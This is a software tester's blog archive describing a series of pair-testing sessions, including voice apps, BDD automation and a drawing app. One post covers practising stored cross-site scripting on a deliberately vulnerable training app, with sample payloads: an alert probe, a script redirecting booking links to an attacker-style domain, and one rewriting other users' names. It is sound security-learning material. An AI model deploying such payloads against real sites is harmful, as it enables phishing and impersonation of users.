Wednesday, October 31, 2018

My Testing Tour 2018 - A Challenge Worth Tackling

My testing tour officially ended today. Now it's time to reflect, gather lessons learned, and draw a conclusion.

Probing

My challenge was to become a better-skilled tester. Inspired by a lot of people around me, I came up with a hypothesis and designed an experiment, or rather a probe, to test it. I decided to go on a testing tour in 2018, from January until the end of October. I paired with many different people, from other teams of my company as well as from our global community, to learn with and from each other. Some sessions were co-located, but most were remote; each took at least 90 minutes, and afterwards I blogged about our lessons learned.

Amazing People

In the end I did 25 pair testing sessions with 22 awesome people within 10 months. I'm still speechless when it comes to these figures. However, it's not about figures, it's about the amazing people who joined me on my journey. We learned so much with and from each other, together. These people were key to the success of this story, so here is a list of everyone I paired with, in the order of their appearance on the tour.
  1. Maaret Pyhäjärvi
  2. Thiago Amanajás
  3. Dianë Xhymshiti
  4. Lisa Crispin
  5. Pranav KS
  6. Peter Kofler
  7. Viv Richards
  8. Cassandra H. Leung
  9. Alex Schladebeck
  10. Viktorija Manevska
  11. João Proença
  12. Mirjana Andovska
  13. Toyer Mamoojee
  14. Thomas Rinke
  15. Simon Berner
  16. Amitai Schleier
  17. Guna Petrova
  18. Claire Reckless
  19. Alex de los Reyes
  20. Rachel Kibler
  21. Marianne Duijst
  22. Gem Hill
If you are on this list, thank you so much for giving this learning experiment a try, for sharing your knowledge, for maybe getting out of your comfort zone yourself, and last but not least for having fun together. Without you the tour would not have happened. I cannot thank you enough for this great experience!

There were further people who agreed to pair up for testing; unfortunately, we could not find time to do so this year. Some day I'd like to catch up on that, in case you're still up for it!
The same goes for all the people who already had a place on the tour and expressed interest in having further sessions. And there are so many more people to learn from. I'm sure more opportunities will come.

Lessons about Pairing & the Tour

If you're interested in the actual testing lessons learned at each stop, you will find them in the individual posts. When it comes to collaboration, I found that I personally prefer the strong-style approach to pairing, with frequent rotations of the navigator and driver roles. In my experience this set us up for sharing implicit knowledge, building on each other's ideas, and smooth collaboration in general right from the start; especially if I had never paired with that person before.

In general, the following things became clear to me on this tour.
  • The concept of accountability and learning partners works for me. We are probably able to do most things on our own, it might just take more time. The problem is that we often simply don't do them on our own; together, we actually do. You don't want to disappoint your pairing partner, right?
  • Make it safe. Having one person share vulnerabilities or fears at the beginning of a session makes it safe for the pair to open up as well. I've witnessed this in several of our sessions. The thing is, I am always nervous in the beginning as well. Some people considered me to be a sort of "expert" - quite the opposite! I'm here to learn myself.
  • More ideas, faster. Pairing up was invaluable for generating ideas about what the problem could be and what to try next to solve it. As pairs we could nicely complement each other and build upon each other's ideas. We hardly ever got stuck or wasted time thinking about what to do next.
  • Implicit knowledge becomes obvious. The best example here was my first stop with Peter. At first, we both thought we knew nearly nothing about security testing, and then we realized we actually knew a lot more than we thought we did. Often people don't see what kind of value they can provide, for example when pairing with developers to write unit tests. However, there's always something to be shared, always something to offer. Every single piece of knowledge, tip or insight helps us test.
  • Give yourself time to learn. Diving into a huge topic or new domain takes time. Doing further sessions to go deeper or focusing on very small, dedicated areas might have helped here.
  • Diversity challenges our own understanding. And it's about creating a shared one! A diverse pair will contribute different thoughts and viewpoints; it will make you think. Also, there is nothing too basic to pair on; both partners can always learn something from each other.
  • Co-location is not a requirement but an excuse. I learned this from Maaret and Toyer, and the tour proved it once again. Remote pair testing sessions can go very smoothly. You can even benefit from geographical dispersal, because it increases the chances of getting a more diverse perspective.

Did it work?

Well, am I a better-skilled tester now? Could I prove my hypothesis? Coming back to it: I did indeed pair, on hands-on exploration and automation as well as on more specialized topics, and I got at least one insight out of each session. Therefore, I succeeded. So I can indeed say: yes, I am a better-skilled tester now. At least, I'm better than yesterday!
  • I have practiced testing a lot more than before.
  • I increased my knowledge around areas new to me like accessibility.
  • I have a lot more tools in my tool belt now.
  • I learned what I know and what I don't know, where I need to practice more.
  • And as a side-effect: I enlarged my network and therefore increased my access to knowledge.
In retrospect, it was worth it. I'm happy I chose this adventure. Is it still scary to pair with other people? Yes it is, but a lot less! I'm now feeling way more comfortable just learning with people, leaving my personal fears aside. "If it's scary, do it more often", right?

My testing tour is now officially over. Still, I seriously consider keeping up the offer to pair test remotely. I might choose a narrower focus next time. Maybe have more sessions with testers from my company's internal community, or with developers from other teams. I would love to find people to mob with! I could also continue with people who have already been on my tour and go deeper on the same topics. There are many options to choose from.

The Next Challenge

At the end of 2016, I made a pact with my learning and accountability partner Toyer Mamoojee to help each other out of our comfort zones and tackle our fear of public speaking in 2017. This worked out so well that we decided to go for another challenge in 2018, which in my case was this testing tour. You might have noticed how successful this was for me as well. I even had the chance to talk about my tour at two conferences already, CAST and SwanseaCon. The best part of sharing my story was that I managed to inspire other people to give this kind of experiment a try as well! I'm already looking forward to giving my talk again at TestBash Brighton next year.

The big question for me now is: what will be my personal challenge for 2019? What I know is that there will be another challenge. I'm already eager to tackle it and super curious to see its outcome. Indeed, I have already brainstormed several topics and ideas, again based on my current fears. However, there's one important thing I learned from my testing tour that I really have to consider: whatever my next challenge will be, it cannot be as time-consuming as my testing tour this year, especially as I continued my public speaking challenge at the same time. I did not track exact numbers, but I estimate the following time effort per session: 2 hours for preparation and communication upfront, 2 hours for the session itself, 1 hour for writing down my notes, and 3 hours for the blog post. And that calculation would only hold for the second half of the sessions, when I already knew what needed to be done and how everything worked. Just considering these figures, I invested 8 hours per session. Times 25 sessions... well, you can do the math. 200 hours in 10 months is a huge investment. On top of that, I know I spent even more hours coming up with the concept, preparing the tour, researching tools and target applications, improving the sessions as the tour went on, and so on. Long story cut short: my next challenge needs to be more flexible and less time-consuming.

In any case I am determined to give myself time to rest first, and then some more time to explore options before I finally decide on my challenge. Whatever it will be, it already helps to know that I will get feedback, support and encouragement. I can rely on my learning partnership with Toyer. I will get the backing from our extended pact group together with João and Diane. I will receive feedback from the even bigger power learning group we kicked off this year. And not to forget my newly increased network and the communities I am so glad to be part of. I consider myself really lucky to have so many amazing people around me. No matter what my new challenge will be, I'm already looking forward to where my journey will lead me next!

Tuesday, October 30, 2018

Testing Tour Stop #25: Pair Penetration Testing with Peter

Just a few days before my testing tour comes to its official end, I had my final stop with Peter Kofler.
We had already had two sessions together on my tour, which makes Peter the only person I had the pleasure of pairing with three times. In all three sessions we tackled different security testing challenges, each time using Dan Billing’s Ticket Magpie as our target. The first time we focused on exploring the application using SQL injection. The second time we tried automating SQL injections. This time we planned to take a closer look at cross-site scripting (XSS) and see what fake content we could place.

Starting Out

At the beginning of our session, we looked for potential input fields where we could give cross-site scripting a try. We registered as a new user and found a comment field on each offered concert. We added a comment containing an HTML tag to see whether this was allowed, and it was. We went ahead and added a simple script that should trigger an alert. Interestingly, the Chrome browser considered this a potential cross-site scripting attempt and blocked it, showing the error code "ERR_BLOCKED_BY_XSS_AUDITOR". Navigating to the affected page again, however, indeed showed us the desired alert.
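To give an idea of how low the entry barrier is: the comment we submitted was, in spirit, as simple as the classic probe below. The exact text is not the point; any script that executes proves the field is vulnerable to stored XSS.

    <script>alert('XSS')</script>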

As we had already proven that the application was vulnerable to cross-site scripting, we decided to try out actual attack scenarios. What if we changed the link of the button for booking a concert to lure the user to a different site? We used our JavaScript knowledge and experimented in Chrome's DevTools console with how to target the desired elements until we had the right command. We added the script to our comment, and this worked just fine!
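The console one-liner we converged on looked roughly like the following sketch; the selector and target URL here are made up for illustration, as I don't recall Ticket Magpie's actual markup.

    // Retarget all 'book concert' buttons to a page the attacker controls
    document.querySelectorAll('a.book-button').forEach(link => {
      link.href = 'https://evil.example/fake-booking';
    });

Once the command did what we wanted in the console, we wrapped it in a script tag and posted it as a comment.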

What about posting comments in the name of another user? This was even easier than expected: we found the user name to be a hidden field of the form, so we could simply change it using DevTools before submitting the comment. Tampering with web parameters was not our goal, though, so we decided to inject a script to change already existing user names instead. We found out how to select the desired elements, submitted our comment including the script, and all targeted user names got replaced. However, we found it did not work when adding a new comment in the name of the targeted user. Right, the script had already been executed at that point in time. So we changed the implementation to be executed only when the DOM content had been fully loaded. It still didn't work, but why? The console showed us that an error was thrown. What was wrong with our script? After spending some time on debugging, we realized it might just be a copy and paste error; we might have copied some non-ASCII characters from a website sample. We sanitized our code - and now it worked!
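In spirit, our final payload looked like this sketch (the selector and the replacement name are invented for illustration, not Ticket Magpie's real markup):

    <script>
      // Wait until the page is fully rendered, then rewrite all user names
      document.addEventListener('DOMContentLoaded', () => {
        document.querySelectorAll('.comment-author').forEach(el => {
          el.textContent = 'Mallory';
        });
      });
    </script>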

All this was surprisingly easy, so we still had some time left, which we spent brainstorming what else we might try on our current practice target, or what we would like to learn more about in general.
One of the best resources for an overview of the most critical web application security risks, alongside further resources, is still the OWASP Top 10.

Looking Back

We were really successful with our attempts. Frustration was kept to a minimum; not everything worked at once, but we made it work together. This was great for learning. However, it also felt quite easy. This might have been due to the fact that Peter and I complemented each other very well regarding our knowledge. Peter contributed most of the JavaScript knowledge where I lacked a lot of practice, and I was fluent with the Chrome DevTools, which he, as a pure backend developer, had never used.

Time flew by and collaboration was smooth. The only thing we noticed: it was not easy for me to not see Peter's screen. I could not tell when he shifted his focus away from the shared screen to his own screen to research useful resources. Though this style had worked for us in previous sessions, we agreed we would try researching together and sharing screen control in a future session. Would we have a future session? Well, the whole area of security testing is still really interesting for both of us, so we might go deeper on this topic together outside of my testing tour.

This was the last stop on my testing tour in 2018. I aimed for ten pair testing sessions in ten months and ended up with 25. I am still amazed by this awesome learning journey together with so many amazing people. My final task to conclude the tour is to take time and reflect on it as a whole, so stay tuned!

Tuesday, October 23, 2018

Testing Tour Stop #24: Pair Exploring Voice Experiences with Gem

At this stop of my testing tour I had the honor to pair test with Gem Hill. I got to know her as an active podcaster and enjoyed listening to several of the 100 episodes (so far) of Let's Talk About Tests Baby. This year, I had the pleasure of meeting Gem in person for the first time at SwanseaCon. We had attended each other's talks, and right after she heard me speak about my testing tour she scheduled a session with me!
Gem shared with me that she had also experienced a pair testing session with Maaret Pyhäjärvi, just like I did on my very first tour stop. She even did a full podcast episode about it, which I can only highly recommend! Ever since meeting Gem, I had been looking forward to our pair testing session. With good reason, as it turned out: I learned a bunch.

Test Setup

Gem proposed to pair test on voice experiences. As we paired remotely, we agreed to use a simulator instead of a real device for testing. My experience with voice apps is very limited; it narrows down to a simple learning project during one of my company's hackrdays last year. Also, I am not a user of voice apps myself. Therefore, I was eagerly looking forward to our session. I also came across some interesting blog posts during preparation.
Gem kindly agreed to prepare a test setup. As she is currently working on voice apps at the BBC, she suggested tackling the BBC Alexa skill, which is basically a player for all BBC radio stations and podcasts. We used the Alexa Simulator and the latest released skill version, publicly available to everyone.

Challenges of Testing Voice Applications

At first, we checked the happy path to start the app and play a radio channel or podcast. Just by doing so, we discovered that the audio player functionality showed issues. Instead of playing the requested source, it triggered a warning that "AudioPlayer is currently an unsupported namespace". Interestingly, the warning message box was not completely displayed on our screen. Well, we're not testing Amazon's services here. Checking later, I found that this is a known limitation of the simulator and audio playback would work on a real device.

Then we tried to change from one radio station to another and stumbled again. Asking to "switch" to another station opened a different skill, TuneIn, attempting to play the requested station there. Unexpected and not desired! We thought maybe native speakers would not say "switch" but rather "change"; however, this command was unknown. What about "go to"? Again, we switched skills. Interestingly, the feature to switch stations is indeed advertised in the skill description.

Let's try asking for the news, a use case we deemed quite common when thinking about radio stations. To our surprise, the player started the podcast "Breaking the News". It seems a synonym had been stored for "the news". Hm, what about just "news"? The skill told us that this radio station was unknown. We tried "weather" instead, another common piece of information you might expect from a radio station. To our surprise, the skill answered with "I can't do that". Strange; we thought that if the request was unknown, it would fall back to the "unknown radio station" case. We tried "cheese", which again was interpreted as an unknown radio station, just as expected. To test the simulator a bit, we tried a clearly misspelled input, "ra7dio 0n3", and this got recognized as an unknown podcast instead. But why? We tried several cases, using written words as well as voice input; however, we could not determine why the skill reacted in three different ways to unknown input values.

We looked at the JSON input and output the simulator showed us. Everything looked good there. So we moved on and tried different languages, like asking for the Scottish Gaelic radio station "nan Gàidheal". The skill understood "nine gale" and asked "Should I play nine gale?" Yet another response we hadn't triggered before! We confirmed, and the skill answered that it couldn't find the station, including a long error message within the response. Interesting finding! However, it was again caused by the simulator and not a real-life example: we had used written input, and the API could not deal with the special character included, which would simply not happen when using voice input.
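For those who have never used the simulator: it displays the exchanged messages as JSON. Expressed as a JavaScript literal, the input side looks roughly like this heavily trimmed sketch; the intent and slot names are invented here, not the BBC skill's real ones.

    // Rough shape of what a skill receives for an utterance like 'play radio one'
    const skillInput = {
      request: {
        type: 'IntentRequest',
        intent: {
          name: 'PlayStationIntent',   // hypothetical intent name
          slots: {
            station: { name: 'station', value: 'radio one' }
          }
        }
      }
    };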

We tried a few more things like seeing whether the station "WM 95.6" got recognized when pronouncing the "." as "point" as well as "dot", or only using "WM". All worked. We tried similarly pronounced words and unclear mumbling to see whether one could be mapped to a station. There were many more options we did not try, like checking any customer reviews on the skill, which in themselves provided lots of useful input for testing.

Throughout our session, Gem shared bits and pieces of wisdom when it comes to testing voice apps.
  • The simulator and real devices behave very differently, so normally they always test on real devices. Furthermore, the simulator is way slower than real devices; another reason to use the latter.
  • They do lots of API testing, checking the JSON output, to ensure the implemented functionality is working as expected.
  • They learned how to test efficiently. Why? Well, when you explore without automation you have to listen to the skill's welcome and introduction text again and again and again and again... This not only takes a lot of time, it also gets annoying very quickly. Very. Quickly. So exploratory testing without automation can indeed be very inefficient in this case, which is why they try to automate as much as possible at the API level (see the sketch after this list).
  • As the team matured, they started to think more about how to increase testability. Even with all the automation in place, you still have to test with real devices, as it's the only way to get the real experience.
  • It is really hard to design voice experiences. For example, you have no idea whether you have a very experienced user who might get annoyed by having to listen to too much navigation, or a newbie who simply needs more instructions.
  • Always ask yourself: are you still testing the skill, or already the device? Testing the device does not make sense; we can't change it anyway. Going through the list of things users actually say and what Alexa understands, however, does make sense, as it allows you to add those phrases as synonyms and make the skill more user-friendly.
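To make the point about API-level automation more concrete, here is a minimal sketch of what such a check could look like, assuming a hypothetical endpoint; real setups would rather go through Amazon's skill testing APIs or the team's own test harness.

    // Send an intent request to the skill backend and assert on the JSON,
    // instead of listening to the welcome text yet again.
    async function expectStationToPlay(stationName) {
      const response = await fetch('https://skill.example/endpoint', {  // hypothetical URL
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({
          request: {
            type: 'IntentRequest',
            intent: {
              name: 'PlayStationIntent',  // hypothetical intent name
              slots: { station: { name: 'station', value: stationName } }
            }
          }
        })
      });
      const body = await response.json();
      if (response.status !== 200 || !body.response) {
        throw new Error(`Unexpected response for "${stationName}": ${JSON.stringify(body)}`);
      }
    }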

Retro Time

We quickly found ourselves at the end of our 90 minute time box. Gem felt the session went very well: using Zoom to share screen control was amazing, she had lots of fun, and the time flew by. For another session she would spend more time in the children's skill the BBC offers, as it has more branching narratives.

For me the session was awesome; Gem provided a perfect test setup for us to practice on. I agreed that a more complex skill would be interesting; however, it was also nice to start with such a "basic" skill as the radio player. It challenged us to come up with good test ideas, and we still found issues even in such a basic skill. I really appreciated Gem sharing her knowledge with me. I learned a lot in our session, and my respect for people designing and testing voice experiences grew even further. Gem shared that it's a real challenge and they are learning something new every day. By the way, a fun fact I learned today: both of us normally listen to audiobooks when at home! It was a real pleasure testing with Gem and I'm already looking forward to seeing her again in real life.

The end of October, the end of my experiment, is getting closer. This was the second-to-last stop on my testing tour 2018. One more to go, so stay tuned!

Wednesday, October 17, 2018

Testing Tour Stop #23: Pair Automating with Marianne

When Marianne Duijst scheduled a pair testing session with me, I was super excited. The last time we had met in real life was at CAST, and it was a real pleasure. Just like this testing tour stop!

Preparation Phase

Both Marianne and I love to explore; however, for our learning session we chose to practice automation together so we could both improve in this area. We wanted a basic setup to start from, so we both looked for projects that suited our needs and considered several options.
Before our session, I had a closer look at each of those options. I got them all running and checked whether I could extend them without too much hassle. Getting back to Marianne with my results, we decided to give the BDD Trader application a try, as testing against an API was something that appealed to both of us. Marianne noted that courses and workshops usually work at the UI level, not the API level. Coming from data warehouse testing, she felt this would be fun and educational to do.

Combining Technical Skills and Domain Knowledge for the Win

At the beginning of our session I introduced Marianne to what I already knew about the BDD Trader application. Our starting point was the project's readme which included explanations about the application domain. In a nutshell, the product allowed users to buy and sell shares using real market data.

As we had agreed in advance, we paired the strong-style way, using my usual suspect of a mob timer. We started the application and verified it was running. We decided to follow the provided exercises, allowing us to get to know the application and the existing tests.

The first part of our session was mainly about following instructions and copying and pasting code. This task was not challenging; however, it gave us time to familiarize ourselves with a few things.
  • We got an overview of the application and a first impression of its capabilities.
  • We gained a shared understanding of the diverse knowledge and experience we each brought to the pair. I could introduce Marianne to some technical and tooling topics like IntelliJ as an IDE, or Cucumber. Marianne, on the other hand, had worked in the financial sector for banks and could introduce me to the domain of trading stocks, which I knew so little about.
  • We found out how to set up our working environment to level the playing field. Marianne shared that she is color-blind, so the IDE's habit of coloring problems like missing class imports in red font was not helpful. Therefore we adjusted IntelliJ's colors for red-green color vision deficiency, which at least improved the situation. It's easy to forget that we don't all share the same access to technology, and it's super important to make it as easy as possible for all of us.
  • We learned how the scenarios had been put together, how to make them pass and how to make them fail as well, which was just as crucial as getting them running.
While following the exercises, we found two issues with the provided documentation.
  1. One code snippet contained numbers like "(1)" that were used as references to explain what was happening at each step further on in the documentation. However, these should have been commented out to allow easier copying and pasting.
  2. Two other code snippets included a method expecting a parameter of type Long, but when the method was called an Integer was passed.
Both issues were easy to fix; however, they made us realize we had fallen into the copy and paste trap. We had not given a single thought to whether we should automate the provided scenarios at all, where the real risks of the product were, and so on; things that you would normally start with. We noted this, but accepted it for the sake of this session's learning purpose.

When we tackled the task of implementing variations on our current scenarios, it got really interesting on a completely different level. Now our thinking skills were in high demand. By adding our own scenarios and adapting their parameters, we explored not only how the tests were implemented, but also how the product behaved. For example, we found that we were not allowed to spend more than we had in our account; we kept in mind that we would add a test for this.

One scenario caused us quite some headaches. We wanted to verify the product's behavior when a registered user made losses on multiple shares. At first we questioned what was really meant by profit here. We tried different parameter values, and the test failed. We noticed we had forgotten to adapt further parameters and changed those as well. However, the scenario kept failing. We commented out all other scenarios of the feature just to be sure there was no dependency. This way our focus fell on the background shared by all scenarios, which provided details about the test data setup that we had missed before. We struggled with identifying the correct data in the data table we used, so we provided the expected values from the error message output, without understanding why - and the test passed. Only then did we finally see which pieces of the jigsaw puzzle we had missed and realize why they were - of course - needed!

Ending Happy

We decided to stop here, in a green state, and reflect. I felt this whole setup mimicked the situation of joining a new team and looking at an existing product with already existing test automation. We were trying to figure out what we saw. We were sharing knowledge about the tooling used. We were aiming to get on common ground regarding the required domain knowledge. And in the end we knew why! Alone, each of us would have sat a lot longer, asking ourselves the same question again and again, from different angles. Combining our knowledge was the key here.

Marianne shared that it was great to experiment in this way. She felt she was still at a point where coping with all the new things at once would have been too overwhelming: the IDE, the provided code, the libraries, etc. But she really liked thinking about the logical problem. We made a perfect match here, as from time to time I felt quite dumb, having a hard time understanding financial domain topics although I felt I should easily grasp those concepts. Marianne caught me here before I got too frustrated with my own shortcomings. Where Marianne was happy to be navigated through technical details and tools and to have someone else generating ideas from that perspective, I was super happy to have someone able to make informed assumptions about the domain and the related product behavior that we could then verify.

Sometimes people with expertise in certain areas, be it technical or domain-oriented or anything else, are tempted to rush ahead and inevitably lose pairing partners who "don't get it" (yet). This is where strong-style pairing can make such a difference. Using this approach, we have to express our thoughts and ideas, we navigate each other through parts we don't know yet, and we have to explain concepts, otherwise the other one would not be able to navigate next. Doing it together, we both got farther than we would have on our own and learned from each other at the same time. To say it with Marianne's words: "This was so cool."

We ended happy, and I'm even happier to meet Marianne again in person at Agile Testing Days in just a few weeks. Her awesome "Sketchnoting Adventures" workshop is definitely on my list of favorites, and I heard there's still a chance to get yourself one step out of your own comfort zone and give an agile unicorn talk!

Saturday, October 13, 2018

Testing Tour Stop #22: Pair Exploring an Online Drawing Application with Rachel

In the original experiment design for my testing tour, I aimed for ten stops from the beginning of 2018 until the end of October. Now, getting closer to this deadline, I realized the community reception was a lot better than expected, so that I even had to limit my number of sessions. And suddenly, only one slot was left, one more potential day I could make time for. A few more stops would come afterwards, but this was a potential gap in my calendar. I considered asking specific people, or asking around on Twitter in general, whether anyone wanted to grab that slot; but then I decided to test this out, to wait and see if someone would go for it themselves. It turned out this was a great decision, as Rachel Kibler reached out and filled the gap!
I met Rachel at CAST earlier this year. I attended her mobile and chatbot testing workshop, which raised my awareness of a lot of things to look out for, what can go wrong, and what the specific problems in those areas are. She also attended my talk about this testing tour, and wrote some very kind words about it, concluding with "Now I want to do the same. There’s so much to learn!"

I'm really happy Rachel seized the opportunity; we had a great pair testing session together!

Getting Started

At the beginning of our session, Rachel shared that she had paired with Maaret Pyhäjärvi for testing only two days before, and it got her hyped up! I could really relate to that, as I had my first testing tour stop with Maaret. If you're reading this and you haven't tried it yourself so far: Maaret is wonderful, and pair testing with her is amazingly enlightening. She really has the gift of feedback.

Rachel and I decided to go for Sketchpad, an online drawing application. I had offered it as a potential test target to several of my previous pair testing partners; however, they had always ended up choosing a different option. Therefore I was happy Rachel now picked this app! Neither of us knew it, so we started from a level playing field.

Rachel was happy with strong-style pairing, so I set my usual mob timer to the usual four minutes and off we went.

What a surprise!

We decided to first see what the application offers. We started broad to get an overview and then make an informed decision about where to dive deeper. Here's how the session went.
  • We opened the application and started to draw something on the empty canvas. The calligraphy brush was active by default and we used it to create a closed form. We wanted to fill it and found nice gradient fill options. How to use those was not completely obvious, but after realizing we had to increase opacity and that these settings only applied to new elements, which get filled instantly on creation, we created a nice new gradient-filled form.
  • We went further and found we could also create stars, in different sizes and rotations. The application made it easy to resize elements or rotate them, providing live information about width, height, angle and offering guiding lines for positioning in relation to the other elements. Our first impression a few minutes in: this product looks quite nifty!
  • What about adding a text element? Here we go. Let's add a new line - hm, why is the cursor blinking in the middle of our first line? Let's write something more - the new text appeared on a new line, with the font size automatically decreased to fit all the text into the box. Well, you can like it or not.
  • Let's see what the emoji tab offers. Oh, it's about adding cliparts. By the way, the smiley icon for this tab looked quite scary. Okay, we can add a cartoon cow to our canvas. Let's add a different one, the penguin looks cute! Choosing it not only selected it as our clipart, but also instantly placed a huge instance of it on our canvas. We didn't like that so much. We placed more of them - and one appeared as a tiny splotch. Strange.
  • There's another tab, offering a filling option. Now we assumed we would be able to fill single elements. However, it seemed we hit the background instead of a single element, as everything got filled! (Coming back to this later, it seemed something had gone wrong when initially trying to fill an element, as this is indeed feasible.) We also discovered a nice feature: we had selected another gradient filling option, a rainbow pattern, and could now even define where which color started.
  • Now what about those elements on our canvas, do they offer a context menu? Indeed! But why does it offer to copy all? Trying it out, we found all elements got selected. Only later did we realize we had triggered the context menu for the background, which offered different options than the menu for single elements. We re-encountered this issue several times later in our session, which proved to be quite annoying. It occurred when we hovered over an element and clicked before the element's frame was displayed.
  • Next to the context menu options, the related shortcut was displayed. However, it was the shortcut for macOS, although we were testing on a Windows laptop! Did they only implement the Mac version? Or maybe the detection of the operating system failed?
  • We had noticed we could move elements over each other. The element context menu offered to change the layer, sending elements completely to the back or front, or doing so stepwise. We found that sending an element one layer backwards did not have any effect. Maybe each element represented one layer, so we just could not see the effect? We checked the layer view and found this assumption to be true, but still the send-backwards feature was broken. Checking the console later, it showed that a warning from raven.js was thrown: "Unhandled rejection (<{"message":"Tool not found."}>, no stack trace)". Not nice.
  • The element context menu also offered to create a stamp out of the given element. Doing so displayed the form as a new stamp brush in the toolbox - however, with inverted colors! This came really unexpectedly. Later I found this was due to the dark theme set by default.
  • We added our new custom stamp to the canvas. The next surprise! Instead of our form, a gray rectangle was created - why? We tried to create another custom stamp - and suddenly this worked as expected. Hm. What was different? We came up with several theories and assumptions, trying out combinations of what we had done before, but could not reproduce the issue. And yet, we had the evidence on the canvas that something had gone wrong here.
  • Maybe only the very first custom stamp did not work? Let's start a new drawing from scratch. To do so, what if we simply reloaded the page? To our surprise, our previous drawing was not lost but still displayed! But the URL did not show any identifier, and we were not logged in. We checked the Application tab in the Chrome DevTools and found that a cookie had been stored, as well as several values in the local storage. We cleared them all (a console sketch of this cleanup follows after this list), reloaded the page, and found ourselves on a clean canvas. We created some new elements as well as a new custom stamp from them, and now the stamp brush worked as expected from the beginning.
  • Keeping the DevTools open with the console showing, we found several warnings being thrown; something to look into in a separate session.
  • We decided to go deeper on stamps and tried different configurations. What surprised us from the user's point of view was that when dragging the stamp brush, the single stamp instances were of different sizes. We found that the brush was set to a range of potential sizes by default. Maybe to make this feature discoverable? It would be interesting to learn how the algorithm behind it calculates the size.
  • We tried further stamp settings. The offset setting behaved quite understandably. Each of those settings offered a bar to set values in a visual way. Dragging the handle, we got a live preview of the effect the new value would have. Except for the spacing setting! We found that the preview only got triggered for smaller ranges, but failed to understand why not for larger ones.
  • The rotation setting was even better. Suddenly we had dragged the handle for the minimum value farther to the right than the handle for the maximum value, inverting the displayed range! Okay, for rotation this might make sense, but we had not expected it, and the other settings did not allow it either.
  • The bar of the size setting had a fixed minimum and maximum value but also provided a field to enter a specific one, which simply asked for trying values higher than the maximum, lower than the minimum, zero, and negative values. The application dealt with them without producing errors, applying only the limits. But the interface still accepted the invalid value when clicking outside the field. A very tiny red bar appeared to show the value was not valid, but that was easy to ignore.
  • We felt we had spent enough time around stamps and set off to something different: the history tab. All our actions were listed and enumerated, the latest one on top. Hovering over the entries, we found the tooltip said "The past". The current entry was "Now". Clicking on a past record, the ones farther up got faded out and said "The future". What a nice way to communicate this!
  • When moving through time, we realized that the redo button in the left sidebar appeared and vanished, seemingly without good reason. We went to the past, and the redo button appeared. We stepped a few entries back towards the future, not all the way, and the redo button disappeared. But why? We could have still stepped through all future items by using redo until reaching our latest status again. We went back further into the past, and the redo button got displayed. Clicking on the same entry again, the "Now", the button vanished again!
  • Going back in time, we suddenly had a canvas state where some of our custom stamp brush lines had turned into lines of those gray rectangles instead! Moving through the history, we could not make them convert back into our actual stamps. We tried to export the drawing to an image, and the gray boxes were exported! We decided to reload the page - and suddenly we had our custom stamp brush lines back. Really weird.
  • Back in the history, we wanted to see what happened when we were at a past state and made a change. We wanted to move an element, and a text element got created instead. Right, the text tool was still selected. Why didn't we see this? We realized that this tool did not change the cursor to provide a hint about which tool was currently selected - unlike other tools we had tried. Inconsistent and not helpful.
  • We browsed a bit further. Checking the settings dialog we found that an autosave feature was active. Something to look into separately.
  • We went on to open a drawing, expecting to open files we had first exported - but no, to our surprise it offered us the drawings we had previously worked on! Even the one we had created before clearing the local storage. It seemed we had missed something. So we went back to the DevTools Application tab and found that the drawing information had been stored in IndexedDB. Nice that users don't lose their drawings; not nice that they are not informed that their drawings fill up the browser's storage. We deleted all entries for one of our images and reloaded the page, and the image was indeed not found; instead, a new canvas opened.
  • We opened one of the other images - and got caught by surprise again. The drawing showed several elements in a strange way, cutting them off. And: our wonderful default gray box stamps had reappeared.
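By the way, the cleanup we did by hand in the Application tab can also be scripted. A console sketch that would have done roughly the same job (the cookie we still deleted manually):

    // Reset Sketchpad's client-side state from the DevTools console
    localStorage.clear();
    sessionStorage.clear();
    // List the page's IndexedDB databases, then delete them one by one
    indexedDB.databases().then(dbs =>
      dbs.forEach(db => indexedDB.deleteDatabase(db.name))
    );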
We felt this was a good point to stop our session and take a few minutes to reflect.

Looking Back

Rachel found that pairing was awesome for generating ideas. The four minute timer felt just perfect. At one point towards the end she shared she was getting tired and running out of ideas. However, she knew she had to push herself just a bit further so the other one could take over navigating.

She mentioned she found it hard to take notes during the session, as even navigating the other one to note something down would have interrupted the flow. I had offered the option of taking notes together at the beginning, but then did not bring it up again. In my recent pair testing sessions I have been trying not to enforce my ways on others too much and instead learn about new approaches.

Rachel said the session was fun, and that it was great that the navigator could really take the time and focus to observe, keeping their eyes open. This helped a lot when facing weird behavior.

Throughout the session I heard us saying lots of things like "wait, what was that, did you see that?", "that was weird", "hmmm" (the sound of frowning), "strange", "ohhh!", "that was unexpected". We made lots of assumptions explicit and also tried to verify them, which I really liked.

In general I found it harder to come up with great test ideas for this kind of application, so different from what I normally test. I had used lots of drawing applications already, but without a focus on testing. It was great to test something completely different, and it was even better to do it together to generate more and better ideas.

Overall, this product really surprised me. In my previous sessions, the test target quickly showed issues or quirky behavior we frowned upon. This time, the product looked quite nice in the beginning! A positive surprise. Then we started to find issues. More of them. When it finally came to opening existing drawings, the surprise had turned from pleasant to unpleasant. Still, this stop was yet again a fun learning session, and I am already looking forward to the last scheduled ones!

Sunday, October 7, 2018

How I Got My First Keynote - Or: Join Me at Testing United 2018!

You might have seen my post about my story as a first-time conference speaker. You might also have seen my tweet about my first year as a conference speaker (I still can't believe the stats of my journey).
You might have seen that I got invited to give my first keynote ever!
But - how did it come about that I'm giving my first keynote only 14 months into public speaking?! Truth is, I don't know.

What I know is that one day in August 2018 I received a message from the Testing United organizers via LinkedIn. It said they had seen one of my talks and liked it (I always appreciate feedback!). They thought it would perfectly fit the managerial track of this year's edition of their conference. They had even considered that I was already scheduled for another conference right before theirs - asking whether I could still make time and would like to join them in Bratislava this year.

No word of a keynote? Exactly. Don't get me wrong - getting invited to do any session, without having to submit a paper and go through the selection process, and that after only one year of public speaking, is already a golden ticket.

I had a look at their conference page. It indeed sounded interesting; however, I worried it might be too much for me this year (remember, I had lots of conferences already done and still on my list back then). I was especially concerned about the timing, as I would be at another conference for a full week just the week before. So I asked them to provide more details via email so I could make a better-informed decision. (Postponing decisions has not proven to be the best thing to do in all cases for me; but this time it was.) The email came the very same evening and started as follows.
Good evening Lisi,

As we started our discussion on Linkedin, we would like to invite you to become one of our keynote speakers on Testing United 2018 conference (two days:November 19-20, Bratislava, Slovakia)
I did not read further. Did it say... keynote?! My first thought: there must have been a mistake, mixing up content and recipient or some such. So I asked for clarification and got the following prompt response.
I believe you could make a big talk in front of big crowd (500ppl) :) 
Wow! It was indeed an invitation to give my first keynote ever! I was speechless - and this was too good an opportunity not to seize.

